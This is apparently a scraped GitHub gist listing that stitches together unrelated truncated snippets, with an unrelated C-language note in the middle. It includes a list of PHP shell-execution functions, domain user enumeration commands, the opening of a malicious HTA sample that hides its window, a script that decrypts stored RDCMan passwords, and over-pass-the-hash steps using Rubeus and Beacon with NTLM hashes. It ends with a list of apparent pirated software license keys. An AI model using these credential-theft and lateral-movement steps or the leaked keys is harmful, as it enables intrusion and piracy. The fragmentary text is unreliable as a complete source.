exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
cynicXer
/ masscan_to_nmap.py
Created
December 8, 2017 21:40
Parse a masscan output and run an nmap scan on it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # import masscan output and run an nmap scan on the results | |
| # | |
| import sys | |
| import argparse | |
| from libnmap.parser import NmapParser, NmapParserException | |
| from libnmap.process import NmapProcess |
its-a-feature
/ Domain Enumeration Commands
Created
January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Domain: TEST.local | |
| User Enumeration: | |
| Windows: | |
| net user | |
| net user /domain | |
| net user [username] | |
| net user [username] /domain | |
| wmic useraccount | |
| Mac: | |
| dscl . ls /Users |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try |
Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.
There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.
1. Combined type and variable/field declaration, inside a struct scope [https://godbolt.org/g/Rh94Go]
struct foo {
struct bar {
int x;
heiny
/ EncryptDecryptRDCMan.ps1
Last active
February 18, 2025 06:52
Powershell: Encrypt/Decrypt Remote Desktop Connection Manager Credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # There is no facility to replace passwords in RDCMan once they are stored. The only way is to create a new custom credential. | |
| # If you open your *.rdg file in a text editor, locate the stored <password>, you can then decrypt it using this script. | |
| # This script can also encrypt a plain text password in rdg format which can be used to overwrite an existing one in the xml. | |
| Add-Type -AssemblyName System.Security; | |
| Function EncryptPassword { | |
| [CmdletBinding()] | |
| param([String]$PlainText = $null) | |
| # convert to RDCMan format: (null terminated chars) |
HarmJ0y
/ gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active
September 29, 2024 12:57
Over-pass-the-hash with Rubeus and Beacon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| # python3 | |
| from urllib.parse import urlparse | |
| import requests | |
| import urllib3 | |
| from bs4 import BeautifulSoup |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Portable Version KEYS: | |
| P6Z3T-UYJC9-YAK3F-APN9M-6ZDSD | |
| FGZPK-93CWX-Q33Y6-D5URV-YXC3X | |
| 9CZQX-9YAQA-PF33L-XVUQH-NSD48 | |
| 8RZ3L-H3Y5L-W2RY5-Z5M8N-C7Z2U | |
| CCZNU-LW3LF-K9V2T-MYZFF-94667 | |
| EWZM6-3W4UX-KH922-C96GK-VGBH2 | |
| Standard Version KEYS: | |
| 4AZNW-S2YHE-LLMWM-J6EL8-7QKDL |